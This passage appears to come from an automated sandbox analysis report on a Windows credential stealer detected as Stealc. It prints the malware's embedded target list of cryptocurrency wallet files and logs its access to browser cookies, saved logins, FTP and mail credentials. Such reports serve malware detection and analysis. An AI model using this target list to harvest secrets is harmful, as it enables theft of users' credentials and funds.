Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3168952289.0000000001482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 7e96f85771.exe, 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001135001\7e96f85771.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000002.3168952289.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7e96f85771.exe PID: 1672, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 0000000A.00000003.2995975951.0000000001160000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3235221216.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 88edf6a100.exe PID: 6848, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 32.0.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.0.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.num.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.7e96f85771.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.7e96f85771.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000000.2989582448.0000000000041000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3164480115.0000000000811000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2874827283.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
